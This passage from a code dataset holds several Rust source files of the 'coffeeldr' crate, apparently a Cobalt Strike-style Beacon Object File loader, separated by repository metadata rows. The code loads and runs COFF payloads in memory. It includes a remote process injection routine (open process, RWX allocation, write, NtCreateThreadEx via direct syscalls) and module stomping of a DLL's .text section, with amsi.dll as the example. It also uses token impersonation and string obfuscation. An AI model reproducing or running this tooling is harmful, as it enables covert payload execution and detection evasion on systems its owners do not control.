.map(|&c| if c as u8 == 0 { '\n' } else { c as u8 as char })
.collect::<String>();
write!(f, "{string}")
}
}
#[repr(C)]
#[derive(Debug, Clone, Copy)]
struct Data {
/// The original buffer.
original: *mut c_char,
/// Current pointer into our buffer.
buffer: *mut c_char,
/// Remaining length of data.
length: c_int,
/// Total size of this buffer.
size: c_int,
}
#[repr(C)]
#[derive(Debug, Clone, Copy)]
struct Format {
/// The original buffer.
original: *mut c_char,
/// Current pointer into our buffer.
buffer: *mut c_char,
/// Remaining length of data.
length: c_int,
/// Total size of this buffer.
size: c_int,
}
/// Resolves the internal address of a built-in Beacon function.
///
/// The lookup uses a Jenkins hash of the symbol name to match the
/// internal function used by BOF payloads.
///
/// # Errors
///
/// Fails when the requested function is not mapped to any known internal handler.
pub fn get_function_internal_address(name: &str) -> Result<usize> {
match jenkins3(name) {
// Output
3210322847u32 => Ok(beacon_printf as *const () as usize),
358755801u32 => Ok(beacon_output as *const () as usize),
2979319955u32 => Ok(beacon_get_output_data as *const () as usize),
// Token
3202664826u32 => Ok(beacon_is_admin as *const () as usize),
233171701u32 => Ok(beacon_use_token as *const () as usize),
2754379686u32 => Ok(beacon_rever_token as *const () as usize),
// Format
1870274128u32 => Ok(beacon_format_int as *const () as usize),
1617256401u32 => Ok(beacon_format_free as *const () as usize),
687949845u32 => Ok(beacon_format_alloc as *const () as usize),
305071883u32 => Ok(beacon_format_reset as *const () as usize),
2824797381u32 => Ok(beacon_formt_printf as *const () as usize),
814630661u32 => Ok(beacon_format_append as *const () as usize),
2821454172u32 => Ok(beacon_format_to_string as *const () as usize),
// Process / injection
3748796315u32 => Ok(beacon_get_spawn_to as *const () as usize),
1991785755u32 => Ok(beacon_inject_process as *const () as usize),
2335479872u32 => Ok(beacon_cleanup_process as *const () as usize),
2755057638u32 => Ok(beacon_spawn_temporary_process as *const () as usize),
131483084u32 => Ok(beacon_inject_temporary_process as *const () as usize),
// Data
1942020652u32 => Ok(beacon_data_int as *const () as usize),
1136370979u32 => Ok(beacon_data_short as *const () as usize),
709123669u32 => Ok(beacon_data_parse as *const () as usize),
2194280572u32 => Ok(beacon_data_length as *const () as usize),
596399976u32 => Ok(beacon_data_extract as *const () as usize),
275872794u32 => Ok(beacon_data_ptr as *const () as usize),
// Utils
2580203873u32 => Ok(to_wide_char as *const () as usize),
3816160102u32 => Ok(0),
_ => Err(CoffeeLdrError::FunctionInternalNotFound(name.to_string())),
}
}
/// Retrieves the current Beacon output buffer.
///
/// If no output has been produced, returns `None`.
/// Otherwise returns a cloned snapshot and clears the internal buffer.
pub fn get_output_data() -> Option<BeaconOutputBuffer> {
let mut beacon = BEACON_BUFFER.lock();
if beacon.buffer.is_empty() {
return None;
}
let output = beacon.clone();
beacon.clear();
Some(output)
}
/// Allocates a new `Format` buffer for Beacon-formatting operations.
///
/// Allocation uses zeroed memory and behaves like the standard BOF runtime.
fn beacon_format_alloc(format: *mut Format, max: c_int) {
if format.is_null() || max == 0 {
return;
}
let layout_result = Layout::from_size_align(max as usize, Layout::new::<i8>().align());
if let Ok(layout) = layout_result {
unsafe {
let original = alloc::alloc::alloc_zeroed(layout).cast::<i8>();
(*format).original = original;
(*format).buffer = original;
(*format).length = 0;
(*format).size = max;
}
}
}
/// Clears the contents of a `Format` buffer by zeroing it.
///
/// The pointer is reset back to the beginning.
fn beacon_format_reset(format: *mut Format) {
if format.is_null() {
return;
}
unsafe {
ptr::write_bytes((*format).original, 0, (*format).size as usize);
(*format).buffer = (*format).original;
(*format).length = (*format).size;
}
}
/// Converts the contents of a `Format` buffer into a C-style string.
///
/// Returns a pointer to the underlying buffer.
fn beacon_format_to_string(format: *mut Format, size: *mut c_int) -> *mut c_char {
if format.is_null() || size.is_null() {
return null_mut();
}
unsafe {
(*size) = (*format).length;
(*format).original
}
}
/// Appends a big-endian integer to the format buffer.
fn beacon_format_int(format: *mut Format, value: c_int) {
if format.is_null() {
return;
}
unsafe {
if (*format).length + 4 > (*format).size {
return;
}
let outdata = swap_endianness(value as u32).to_be_bytes();
ptr::copy_nonoverlapping(outdata.as_ptr(), (*format).buffer as *mut u8, 4);
(*format).buffer = (*format).buffer.add(4);
(*format).length += 4;
}
}
/// Appends arbitrary raw bytes to a `Format` buffer.
fn beacon_format_append(format: *mut Format, text: *const c_char, len: c_int) {
if format.is_null() || text.is_null() || len <= 0 {
return;
}
unsafe {
if (*format).length + len > (*format).size {
return;
}
ptr::copy_nonoverlapping(text, (*format).buffer, len as usize);
(*format).buffer = (*format).buffer.add(len as usize);
(*format).length += len;
}
}
/// Frees the memory associated with a `Format` buffer.
fn beacon_format_free(format: *mut Format) {
if format.is_null() {
return;
}
unsafe {
if !(*format).original.is_null() {
let layout_result = Layout::from_size_align((*format).size as usize, Layout::new::<i8>().align());
if let Ok(layout) = layout_result {
alloc::alloc::dealloc((*format).original as *mut u8, layout);
(*format).original = null_mut();
}
}
(*format).buffer = null_mut();
(*format).length = 0;
(*format).size = 0;
}
}
/// Formats a string using printf-style formatting and appends the result
/// to a `Format` buffer.
///
/// Follows the behavior of Beacon’s `beacon_formt_printf`.
#[unsafe(no_mangle)]
unsafe extern "C" fn beacon_formt_printf(format: *mut Format, fmt: *const c_char, mut args: ...) {
if format.is_null() || fmt.is_null() {
return;
}
let fmt_str = CStr::from_ptr(fmt).to_str().unwrap_or("");
let mut temp_str = String::new();
printf_compat::format(fmt_str.as_ptr().cast(), args.as_va_list(), printf_compat::output::fmt_write(&mut temp_str));
let length_needed = temp_str.len() as c_int;
if (*format).length + length_needed >= (*format).size {
return;
}
ptr::copy_nonoverlapping(
temp_str.as_ptr() as *const c_char,
(*format).buffer.add((*format).length as usize),
length_needed as usize,
);
(*format).length += length_needed;
}
/// Extracts a 2-byte value from a Beacon `Data` buffer.
fn beacon_data_short(data: *mut Data) -> c_short {
if data.is_null() {
return 0;
}
let parser = unsafe { &mut *data };
if parser.length < 2 {
return 0;
}
let result = unsafe { ptr::read_unaligned(parser.buffer as *const i16) };
parser.buffer = unsafe { parser.buffer.add(2) };
parser.length -= 2;
result as c_short
}
/// Extracts a 4-byte value from a Beacon `Data` buffer.
fn beacon_data_int(data: *mut Data) -> c_int {
if data.is_null() {
return 0;
}
let parser = unsafe { &mut *data };
if parser.length < 4 {
return 0;
}
let result = unsafe { ptr::read_unaligned(parser.buffer as *const i32) };
parser.buffer = unsafe { parser.buffer.add(4) };
parser.length -= 4;
result as c_int
}
/// Extracts an arbitrary-length blob from a `Data` buffer.
fn beacon_data_extract(data: *mut Data, size: *mut c_int) -> *mut c_char {
if data.is_null() {
return null_mut();
}
let parser = unsafe { &mut *data };
if parser.length < 4 {
return null_mut();
}
let length = unsafe { ptr::read_unaligned(parser.buffer as *const u32) };
let outdata = unsafe { parser.buffer.add(4) };
if outdata.is_null() {
return null_mut();
}
parser.buffer = unsafe { parser.buffer.add(4 + length as usize) };
parser.length -= 4 + length as c_int;
if !size.is_null() && !outdata.is_null() {
unsafe {
*size = length as c_int;
}
}
outdata as *mut c_char
}
/// Initializes a `Data` parser over a raw buffer.
fn beacon_data_parse(data: *mut Data, buffer: *mut c_char, size: c_int) {
if data.is_null() {
return;
}
unsafe {
(*data).original = buffer;
(*data).buffer = buffer.add(4);
(*data).length = size - 4;
(*data).size = size - 4;
}
}
/// Returns the remaining data length in a `Data` parser.
fn beacon_data_length(data: *const Data) -> c_int {
if data.is_null() {
return 0;
}
unsafe { (*data).length }
}
/// Returns the collected Beacon output and size as raw bytes.
fn beacon_get_output_data(outsize: *mut c_int) -> *mut c_char {
unsafe {
let mut beacon = BEACON_BUFFER.lock();
let (ptr, size) = beacon.get_output();
if !outsize.is_null() {
*outsize = size as c_int;
}
ptr
}
}
/// Appends raw output data into the Beacon output buffer.
fn beacon_output(_type: c_int, data: *mut c_char, len: c_int) {
let mut buffer = BEACON_BUFFER.lock();
buffer.append_char(data, len);
}
/// Formats a string using Beacon’s printf mechanism and stores it.
#[unsafe(no_mangle)]
unsafe extern "C" fn beacon_printf(_type: c_int, fmt: *mut c_char, mut args: ...) {
let mut str = String::new();
printf_compat::format(fmt, args.as_va_list(), printf_compat::output::fmt_write(&mut str));
str.push('\0');
let mut buffer = BEACON_BUFFER.lock();
buffer.append_string(&str);
}
/// Reverts any impersonated token back to the original process token.
fn beacon_rever_token() {
unsafe {
if RevertToSelf() == 0 {
log::warn!("RevertToSelf Failed!")
}
}
}
/// Applies a token to the current thread.
fn beacon_use_token(token: HANDLE) -> i32 {
unsafe { SetThreadToken(null_mut(), token) }
}
/// Closes handles associated with a spawned process.
fn beacon_cleanup_process(info: *const PROCESS_INFORMATION) {
unsafe {
CloseHandle((*info).hProcess);
CloseHandle((*info).hThread);
}
}
/// Checks whether the current process is elevated (admin token).
fn beacon_is_admin() -> u32 {
let mut h_token = null_mut();
unsafe {
if OpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &mut h_token) != 0 {
let mut elevation = TOKEN_ELEVATION { TokenIsElevated: 0 };
let mut return_length = 0;
if GetTokenInformation(
h_token,
TokenElevation,
&mut elevation as *mut _ as *mut c_void,
size_of::<TOKEN_ELEVATION>() as u32,
&mut return_length,
) != 0
{
return (elevation.TokenIsElevated == 1) as u32;
}
}
}
0
}
/// Converts endianness of a 32-bit integer.
fn swap_endianness(src: u32) -> u32 {
// Check if the system is little-endian
if cfg!(target_endian = "little") {
// Small-endian to large-endian converter
src.swap_bytes()
} else {
// If it is already big-endian, it returns the original value
src
}
}
/// Converts a C-string to UTF-16 and writes it into the destination buffer.
fn to_wide_char(src: *const c_char, dst: *mut u16, max: c_int) -> c_int {
if src.is_null() || dst.is_null() || max < size_of::<u16>() as c_int {
return 0;
}
unsafe {
// Converting the `src` pointer to a C string
let c_str = CStr::from_ptr(src);
// Converts CStr to a Rust string
if let Ok(str_slice) = c_str.to_str() {
// Encoding a Rust string as UTF-16
let utf16_chars = str_slice.encode_utf16().collect::<Vec<u16>>();
let dst_slice = core::slice::from_raw_parts_mut(dst, (max as usize) / size_of::<u16>());
let num_chars = utf16_chars.len();
if num_chars >= dst_slice.len() {
return 0; // Not enough space
}
// Copy the UTF-16 characters to the destination buffer
dst_slice[..num_chars].copy_from_slice(&utf16_chars);
// Adds the null-terminator
dst_slice[num_chars] = 0;
}
}
1
}
/// Performs remote process injection into a target process via NT syscalls.
fn beacon_inject_process(
_h_process: HANDLE,
pid: c_int,
payload: *const c_char,
len: c_int,
_offset: c_char,
_arg: *const c_char,
_a_len: c_int
) {
if payload.is_null() || len <= 0 {
return;
}
unsafe {
let mut oa = OBJECT_ATTRIBUTES::default();
let mut ci = CLIENT_ID {
UniqueProcess: pid as HANDLE,
UniqueThread: null_mut(),
};
let mut h_process = null_mut::<c_void>();
let status = syscall!(s!("NtOpenProcess"), &mut h_process, PROCESS_ALL_ACCESS, &mut oa, &mut ci);
if status != Some(STATUS_SUCCESS) {
return;
}
let mut size = len as usize;
let mut address = null_mut::<c_void>();
let mut status = syscall!(
s!("NtAllocateVirtualMemory"),
h_process,
&mut address,
0,
&mut size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if status != Some(STATUS_SUCCESS) {
CloseHandle(h_process);
return;
}
let mut now = 0usize;
status = syscall!(s!("NtWriteVirtualMemory"), h_process, address, payload as *const c_void, len as usize, &mut now);
if status != Some(STATUS_SUCCESS) {
CloseHandle(h_process);
return;
}
let mut h_thread = null_mut::<c_void>();
status = syscall!(
s!("NtCreateThreadEx"),
&mut h_thread,
THREAD_ALL_ACCESS,
null_mut::<c_void>(),
h_process,
address,
null_mut::<c_void>(),
0usize,
0usize,
0usize,
0usize,
null_mut::<c_void>()
);
if status != Some(STATUS_SUCCESS) || h_thread.is_null() {
CloseHandle(h_process);
return;
}
CloseHandle(h_thread);
CloseHandle(h_process);
}
}
/// Extracts a pointer to a region of the `Data` buffer.
fn beacon_data_ptr(data: *mut Data, size: c_int) -> *mut c_char {
if data.is_null() || size <= 0 {
return null_mut();
}
let parser = unsafe { &mut *data };
if parser.length < size {
return null_mut();
}
let result = parser.buffer;
parser.buffer = unsafe { parser.buffer.add(size as usize) };
parser.length -= size;
result
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_inject_temporary_process(
_info: *const PROCESS_INFORMATION,
_payload: *const c_char,
_len: c_int,
_offset: c_int,
_arg: *const c_char,
_a_len: c_int,
) {
unimplemented!()
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_spawn_temporary_process(
_x86: i32,
_ignore_token: i32,
_s_info: *mut STARTUPINFOA,
_p_info: *mut PROCESS_INFORMATION
) {
unimplemented!()
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_get_spawn_to(_x86: i32, _buffer: *const c_char, _length: c_int) {
unimplemented!()
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/lib.rs | src/lib.rs | #![no_std]
#![doc = include_str!("../README.md")]
#![feature(c_variadic, core_intrinsics)]
#![allow(clippy::ptr_eq)]
#![allow(non_snake_case, non_camel_case_types)]
#![allow(internal_features, unsafe_op_in_unsafe_fn)]
extern crate alloc;
mod beacon;
mod loader;
mod beacon_pack;
pub mod coff;
pub mod error;
pub use loader::CoffeeLdr;
pub use beacon_pack::BeaconPack;
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/error.rs | src/error.rs | //! Errors returned by this crate.
//!
//! This module contains the definitions for all error types returned by this crate.
use alloc::string::String;
use thiserror::Error;
/// Result alias for CoffeeLdr operations.
pub type Result<T> = core::result::Result<T, CoffeeLdrError>;
/// Represents all possible errors that can occur in the COFF loader.
#[derive(Debug, Error)]
pub enum CoffeeLdrError {
/// Generic error with descriptive message.
#[error("{0}")]
Msg(String),
/// Error returned by the `binrw` parser while reading or deserializing COFF data.
#[error("binrw error: {0}")]
Binrw(binrw::Error),
/// Hexadecimal encoding or decoding failure.
#[error("hex error: {0}")]
Hex(hex::FromHexError),
/// I/O read or write failure.
#[error("io error: {0}")]
Io(binrw::io::Error),
/// Nested COFF parsing or validation error.
#[error("coff error: {0}")]
CoffError(#[from] CoffError),
/// Memory allocation failure.
#[error("memory allocation error: code {0}")]
MemoryAllocationError(u32),
/// Memory protection or permission failure.
#[error("memory protection error: code {0}")]
MemoryProtectionError(u32),
/// Invalid or malformed symbol format.
#[error("invalid symbol format: '{0}'")]
InvalidSymbolFormat(String),
/// Unsupported relocation type.
#[error("invalid relocation type: {0}")]
InvalidRelocationType(u16),
/// Symbol not found during resolution.
#[error("symbol not found: '{0}'")]
FunctionNotFound(String),
/// Internal symbol could not be resolved.
#[error("internal symbol not found: '{0}'")]
FunctionInternalNotFound(String),
/// Target module could not be resolved.
#[error("module not found: '{0}'")]
ModuleNotFound(String),
/// Failed to parse or load COFF file.
#[error("error loading COFF file")]
ParsingError,
/// Architecture mismatch between file and host.
#[error("arch mismatch: expected {expected}, actual {actual}")]
ArchitectureMismatch { expected: &'static str, actual: &'static str },
/// File contains more symbols than supported.
#[error("too many symbols (max {0})")]
TooManySymbols(usize),
/// Failed to parse symbol entry.
#[error("symbol parse error: '{0}'")]
ParseError(String),
/// Symbol ignored due to missing required prefix.
#[error("symbol ignored (missing required prefix)")]
SymbolIgnored,
/// Error reading or flushing output buffer.
#[error("output read error")]
OutputError,
/// `.text` section could not be located.
#[error("missing .text section in target module")]
StompingTextSectionNotFound,
/// COFF too large to overwrite target module.
#[error("stomping size overflow")]
StompingSizeOverflow,
/// Missing base address during module stomping.
#[error("missing base address for target section")]
MissingStompingBaseAddress,
}
/// Represents specific errors during COFF parsing or validation.
#[derive(Debug, Error)]
pub enum CoffError {
/// File could not be opened or read.
#[error("file read error: {0}")]
FileReadError(String),
/// COFF header is invalid or missing.
#[error("invalid COFF header")]
InvalidCoffFile,
/// COFF symbol table could not be read.
#[error("invalid COFF symbols")]
InvalidCoffSymbolsFile,
/// COFF section headers are invalid or missing.
#[error("invalid COFF section headers")]
InvalidCoffSectionFile,
/// Architecture not supported (expected x64 or x86).
#[error("unsupported architecture")]
UnsupportedArchitecture,
/// Invalid section or symbol count.
#[error("invalid number of sections or symbols")]
InvalidSectionsOrSymbols,
/// Section count exceeds supported limit.
#[error("section limit exceeded (max 96)")]
SectionLimitExceeded,
}
impl From<hex::FromHexError> for CoffeeLdrError {
fn from(err: hex::FromHexError) -> Self {
CoffeeLdrError::Hex(err)
}
}
impl From<binrw::io::Error> for CoffeeLdrError {
fn from(err: binrw::io::Error) -> Self {
CoffeeLdrError::Binrw(binrw::Error::Io(err))
}
} | rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/loader.rs | src/loader.rs | use alloc::{
boxed::Box,
collections::BTreeMap,
ffi::CString,
format,
string::{String, ToString},
vec::Vec,
vec,
};
use core::intrinsics::{
volatile_copy_nonoverlapping_memory,
volatile_set_memory
};
use core::{
ffi::c_void,
mem::transmute,
ptr::{
null_mut,
read_unaligned,
write_unaligned
},
};
use log::{debug, info, warn};
use obfstr::{obfstr as obf, obfstring as s};
use dinvk::{dinvoke, helper::PE, types::NTSTATUS};
use dinvk::module::{
get_proc_address,
get_module_address,
get_ntdll_address
};
use dinvk::winapis::{
NT_SUCCESS, NtProtectVirtualMemory,
NtAllocateVirtualMemory, NtCurrentProcess,
LoadLibraryA,
};
use windows_sys::Win32::{
Foundation::*,
Storage::FileSystem::*,
System::{
Memory::*,
SystemServices::*,
Diagnostics::Debug::*,
LibraryLoader::DONT_RESOLVE_DLL_REFERENCES,
},
};
use crate::error::{CoffError, CoffeeLdrError, Result};
use crate::coff::{Coff, CoffMachine, CoffSource};
use crate::coff::{IMAGE_RELOCATION, IMAGE_SYMBOL};
use crate::beacon::{get_function_internal_address, get_output_data};
/// Type alias for the COFF main input function.
type CoffMain = extern "C" fn(*mut u8, usize);
/// Represents a Rust interface to the COFF (Common Object File Format) files.
///
/// # Examples
///
/// Using a file as a source:
///
/// ```
/// use coffeeldr::CoffeeLdr;
///
/// let mut loader = CoffeeLdr::new("whoami.o");
/// match loader {
/// Ok(ldr) => {
/// println!("COFF successfully uploaded!");
/// // Use `ldr` to execute or process the COFF file
/// },
/// Err(e) => eprintln!("Error loading COFF: {:?}", e),
/// }
/// ```
///
/// Using a byte buffer as a source:
///
/// ```
/// use coffeeldr::CoffeeLdr;
///
/// let coff_data = include_bytes!("path/to/coff_file.o");
/// let mut loader = CoffeeLdr::new(&coff_data);
/// match loader {
/// Ok(ldr) => {
/// println!("COFF successfully loaded from buffer!");
/// // Use `ldr` to execute or process the COFF file
/// },
/// Err(e) => eprintln!("Error loading COFF: {:?}", e),
/// }
/// ```
#[derive(Default)]
pub struct CoffeeLdr<'a> {
/// Parsed COFF object backing this loader.
coff: Coff<'a>,
/// Mapping for each allocated section.
section_map: Vec<SectionMap>,
/// Table of resolved external functions.
symbols: CoffSymbol,
/// Name of the module that will be stomped when stomping is enabled.
module: &'a str,
}
impl<'a> CoffeeLdr<'a> {
/// Creates a new COFF loader from a file path or raw buffer.
///
/// The source is parsed immediately. If the file cannot be
/// read or the COFF format is invalid, an error is returned.
///
/// # Errors
///
/// Fails when the file cannot be read or the COFF data is malformed.
///
/// # Examples
///
/// ```
/// let loader = CoffeeLdr::new("payload.o")?;
/// ```
pub fn new<T: Into<CoffSource<'a>>>(source: T) -> Result<Self> {
// Processes COFF based on the source (file or buffer)
let coff = match source.into() {
CoffSource::File(path) => {
info!("Try to read the file: {path}");
// Try reading the file
let buffer = read_file(path)
.map_err(|_| CoffError::FileReadError(path.to_string()))?;
// Creates the COFF object from the buffer
Coff::parse(Box::leak(buffer.into_boxed_slice()))?
}
// Creates the COFF directly from the buffer
CoffSource::Buffer(buffer) => Coff::parse(buffer)?,
};
Ok(Self {
coff,
section_map: Vec::new(),
symbols: CoffSymbol::default(),
..Default::default()
})
}
/// Enables module stomping using the specified module's `.text` region.
///
/// When enabled, the loader overwrites the module's `.text` section instead
/// of allocating fresh memory.
///
/// # Examples
///
/// ```
/// let loader = CoffeeLdr::new("bof.o")?
/// .with_module_stomping("amsi.dll");
/// ```
#[must_use]
pub fn with_module_stomping(mut self, module: &'a str) -> Self {
self.module = module;
self
}
/// Executes the COFF payload by invoking the chosen entry point.
///
/// The loader prepares memory, applies relocations, resolves imports,
/// and then jumps to the specified entry symbol.
/// Any Beacon output captured during execution is returned as a string.
///
/// # Errors
///
/// Fails if preparation fails (bad architecture, memory failure,
/// relocation errors, unresolved imports) or if output transport fails.
///
/// # Examples
///
/// ```
/// let mut loader = CoffeeLdr::new("whoami.o")?;
/// let output = loader.run("go", None, None)?;
/// println!("{output}");
/// ```
pub fn run(
&mut self,
entry: &str,
args: Option<*mut u8>,
argc: Option<usize>,
) -> Result<String> {
info!("Preparing environment for COFF execution.");
// Prepares the environment to execute the COFF file
self.prepare()?;
for symbol in &self.coff.symbols {
let name = self.coff.get_symbol_name(symbol);
if name == entry && Coff::is_fcn(symbol.Type) {
info!("Running COFF file: entry point = {}, args = {:?}, argc = {:?}", name, args, argc);
let section_addr = self.section_map[(symbol.SectionNumber - 1) as usize].base;
let entrypoint = unsafe { section_addr.offset(symbol.Value as isize) };
let coff_main: CoffMain = unsafe { transmute(entrypoint) };
coff_main(args.unwrap_or(null_mut()), argc.unwrap_or(0));
break;
}
}
// Returns the output if available, otherwise, returns an empty response
Ok(get_output_data()
.filter(|o| !o.buffer.is_empty())
.map(|o| o.to_string())
.unwrap_or_default())
}
/// Prepares the COFF for execution.
///
/// This includes architecture verification, memory allocation,
/// symbol resolution, relocation processing and applying final protections.
///
/// # Errors
///
/// Fails if memory allocation fails, relocation cannot be applied,
/// or required symbols cannot be resolved.
fn prepare(&mut self) -> Result<()> {
// Verify that the COFF file's architecture
self.coff.arch.check_architecture()?;
// Allocate memory for loading COFF sections and store the allocated section mappings
let mem = CoffMemory::new(&self.coff, self.module);
let (sections, sec_base) = mem.alloc()?;
self.section_map = sections;
// Resolve external symbols and build a function lookup map
let (functions, symbols) = CoffSymbol::new(&self.coff, self.module, sec_base)?;
self.symbols = symbols;
// Process relocations to correctly adjust symbol addresses based on memory layout
let reloc = CoffRelocation::new(&self.coff, &self.section_map);
reloc.apply_relocations(&functions, &self.symbols)?;
// Adjust memory permissions for allocated sections
self.section_map
.iter_mut()
.filter(|section| section.size > 0)
.try_for_each(|section| section.adjust_permissions())?;
Ok(())
}
}
impl Drop for CoffeeLdr<'_> {
fn drop(&mut self) {
// When stomping, memory belongs to another module and must not be freed
if !self.module.is_empty() {
return;
}
let mut size = 0;
for section in self.section_map.iter_mut() {
if !section.base.is_null() {
NtFreeVirtualMemory(
NtCurrentProcess(),
&mut section.base,
&mut size,
MEM_RELEASE
);
}
}
if !self.symbols.address.is_null() {
NtFreeVirtualMemory(
NtCurrentProcess(),
unsafe { &mut *self.symbols.address },
&mut size,
MEM_RELEASE
);
}
}
}
/// Manages allocation and optional module stomping for COFF sections.
struct CoffMemory<'a> {
    /// Parsed COFF file to be loaded.
    coff: &'a Coff<'a>,
    /// Name of the target module to stomp. An empty string disables
    /// stomping and a fresh private allocation is used instead.
    module: &'a str,
}
impl<'a> CoffMemory<'a> {
    /// Creates a memory allocator for this COFF instance.
    pub fn new(coff: &'a Coff<'a>, module: &'a str) -> Self {
        Self {
            coff,
            module,
        }
    }
    /// Allocates memory either by stomping a module or reserving a new region.
    ///
    /// # Errors
    ///
    /// Fails if memory cannot be allocated or stomping cannot be applied.
    pub fn alloc(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
        // A non-empty module name selects the stomping strategy.
        if !self.module.is_empty() {
            self.alloc_with_stomping()
        } else {
            self.alloc_bof_memory()
        }
    }
    /// Allocates fresh executable memory for the COFF payload.
    ///
    /// The region is committed RW; per-section protections are applied later
    /// (see `SectionMap::adjust_permissions`).
    ///
    /// # Errors
    ///
    /// Fails if the OS cannot allocate the region.
    fn alloc_bof_memory(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
        let mut size = self.coff.size();
        let mut addr = null_mut();
        let status = NtAllocateVirtualMemory(
            NtCurrentProcess(),
            &mut addr,
            0,
            &mut size,
            MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN,
            PAGE_READWRITE
        );
        if status != STATUS_SUCCESS {
            // NOTE(review): the NTSTATUS is available in `status`; the error is
            // built from GetLastError() instead — confirm which code is wanted.
            return Err(CoffeeLdrError::MemoryAllocationError(unsafe { GetLastError() }));
        }
        debug!("Memory successfully allocated for BOF at address: {:?}", addr);
        // No stomping: the second tuple element (symbol-table base) is None.
        let (sections, _) = SectionMap::copy_sections(addr, self.coff);
        Ok((sections, None))
    }
    /// Performs module stomping by overwriting a module’s `.text` section.
    ///
    /// # Errors
    ///
    /// Fails if the section cannot be located, resized or overwritten.
    fn alloc_with_stomping(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
        let (mut text_address, mut size) = self.get_text_module()
            .ok_or(CoffeeLdrError::StompingTextSectionNotFound)?;
        // If the file is larger than the space inside the .text of the target module,
        // we do not stomp
        if self.coff.size() > size {
            return Err(CoffeeLdrError::StompingSizeOverflow);
        }
        // Make the module's .text writable so the COFF image can be copied in.
        let mut old = 0;
        if !NT_SUCCESS(NtProtectVirtualMemory(
            NtCurrentProcess(),
            &mut text_address,
            &mut size,
            PAGE_READWRITE,
            &mut old
        )) {
            return Err(CoffeeLdrError::MemoryProtectionError(unsafe { GetLastError() }));
        }
        // This is necessary because REL32 instructions must remain within range, and allocating the `Symbol`
        // elsewhere (e.g. with a distant `NtAllocateVirtualMemory`) could lead to crashes
        debug!(
            "Memory successfully allocated for BOF at address (Module Stomping): {:?}",
            text_address
        );
        // `sec_base` points just past the copied sections; the symbol table is
        // placed there so it stays within REL32 range of the code.
        let (sections, sec_base) = SectionMap::copy_sections(text_address, self.coff);
        Ok((sections, Some(sec_base)))
    }
    /// Finds the `.text` section of the target module, if present.
    fn get_text_module(&self) -> Option<(*mut c_void, usize)> {
        // Invoking LoadLibraryExA dynamically
        let target = format!("{}\0", self.module);
        let h_module = {
            // Prefer an already-loaded module; otherwise load it without
            // resolving imports (DONT_RESOLVE_DLL_REFERENCES, per Win32 docs).
            let handle = get_module_address(self.module, None);
            if handle.is_null() {
                LoadLibraryExA(
                    target.as_ptr(),
                    null_mut(),
                    DONT_RESOLVE_DLL_REFERENCES
                )?
            } else {
                handle
            }
        };
        if h_module.is_null() {
            return None;
        }
        // Retrieving `.text` from the target module
        let pe = PE::parse(h_module);
        let section = pe.section_by_name(obf!(".text"))?;
        let ptr = (h_module as usize + section.VirtualAddress as usize) as *mut c_void;
        let size = section.SizeOfRawData as usize;
        Some((ptr, size))
    }
}
/// Maximum number of symbols that the function map can handle.
const MAX_SYMBOLS: usize = 600;
/// Represents a mapping of external symbols (functions) to their memory addresses.
#[derive(Debug, Clone, Copy)]
struct CoffSymbol {
    /// A pointer to an array of pointers, each pointing to an external function.
    /// Backed either by a fresh RW allocation or, when stomping, by the
    /// region directly after the copied sections.
    address: *mut *mut c_void,
}
impl CoffSymbol {
    /// Resolves all external symbols used by the COFF image.
    ///
    /// # Errors
    ///
    /// Fails if the table cannot be allocated or any symbol cannot be resolved.
    pub fn new(
        coff: &Coff,
        module: &str,
        base_addr: Option<*mut c_void>,
    ) -> Result<(BTreeMap<String, usize>, Self)> {
        // Resolves the symbols of the coff file
        let symbols = Self::process_symbols(coff)?;
        // When stomping, we must reuse the memory at `base_addr`
        let address = if !module.is_empty() {
            let addr = base_addr.ok_or(CoffeeLdrError::MissingStompingBaseAddress)?;
            addr as *mut *mut c_void
        } else {
            // Otherwise allocate a dedicated RW table with room for MAX_SYMBOLS entries.
            let mut size = MAX_SYMBOLS * size_of::<*mut c_void>();
            let mut addr = null_mut();
            let status = NtAllocateVirtualMemory(
                NtCurrentProcess(),
                &mut addr,
                0,
                &mut size,
                MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN,
                PAGE_READWRITE,
            );
            if addr.is_null() || status != STATUS_SUCCESS {
                return Err(CoffeeLdrError::MemoryAllocationError(unsafe { GetLastError() }));
            }
            addr as *mut *mut c_void
        };
        Ok((symbols, Self { address }))
    }
    /// Scans the COFF symbol table for imports and resolves them.
    ///
    /// Only external symbols with `SectionNumber == 0` (undefined, i.e.
    /// imported) are resolved; everything else is left to relocation.
    ///
    /// # Errors
    ///
    /// Fails if symbol count exceeds limit or any import cannot be resolved.
    fn process_symbols(coff: &Coff) -> Result<BTreeMap<String, usize>> {
        let mut functions = BTreeMap::new();
        for symbol in &coff.symbols {
            if functions.len() >= MAX_SYMBOLS {
                return Err(CoffeeLdrError::TooManySymbols(functions.len()));
            }
            if symbol.StorageClass == IMAGE_SYM_CLASS_EXTERNAL as u8 && symbol.SectionNumber == 0 {
                let name = coff.get_symbol_name(symbol);
                // NOTE(review): a resolution failure (including `SymbolIgnored`
                // for names without the `__imp_` prefix) aborts the whole scan
                // via `?` — confirm undefined non-import symbols cannot occur.
                let address = Self::resolve_symbol_address(&name, coff)?;
                functions.insert(name, address);
            }
        }
        Ok(functions)
    }
    /// Resolves a symbol name to an address: Beacon helpers or DLL exports.
    ///
    /// # Errors
    ///
